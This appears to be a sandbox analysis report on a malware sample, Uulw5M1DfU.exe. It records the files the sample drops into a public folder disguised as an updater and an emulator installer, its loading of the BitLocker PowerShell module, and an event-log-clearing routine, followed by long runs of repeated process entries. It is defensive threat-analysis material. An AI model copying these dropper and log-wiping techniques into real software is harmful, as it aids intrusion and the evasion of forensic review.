Source:	Binary string: H:\trunk_download\downloader_cn\downloader\bin\ldplayerinst.pdbo source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

Code function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

0_2_00406D5D

Source: Update.dll.0.dr	Static PE information: section name: .00cfg
Source: backup.dll.3.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Code function: 0_2_00411C20 push eax; ret	0_2_00411C4E
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_03804345 push ecx; ret	3_2_03804358
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0381A168 push eax; ret	3_2_0381A119
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0381A0B8 push eax; ret	3_2_0381A119
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_03812450 push ebp; retf	3_2_03812474
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_03812470 push ebp; retf	3_2_03812474
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA9CAF7 push ecx; ret	3_2_6CA9CB0A
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_10009DF5 push ecx; ret	3_2_10009E08
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_1001FE9A push ecx; ret	3_2_1001FEBF
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C7CAFF push eax; retf	3_2_00C7CB00
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C7CB61 pushfd ; retf	3_2_00C7CB64
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C7CB07 pushad ; retf	3_2_00C7CB08
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C7CB0B push 701000CBh; retf	3_2_00C7CB10
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C79DCC push ecx; ret	3_2_00C79DDF
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_03683D04 push ecx; ret	3_2_03683D17
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_07983B68 pushad ; ret	18_2_07983DB1

Source: C:\Users\Public\Bilite\Axialis\Update.exe	File created: C:\Users\user\AppData\Local\Temp\backup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	File created: C:\Users\Public\Bilite\Axialis\Update.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	File created: C:\Users\Public\Bilite\Axialis\Update.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	File created: C:\Users\Public\Bilite\ldplayer9_ld_6000_ld.exe	Jump to dropped file
Source: C:\Users\Public\Bilite\Axialis\Update.exe	File created: C:\Users\user\AppData\Local\Temp\backup.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_037FB3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,

3_2_037FB3C0

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Key value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4

Jump to behavior

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
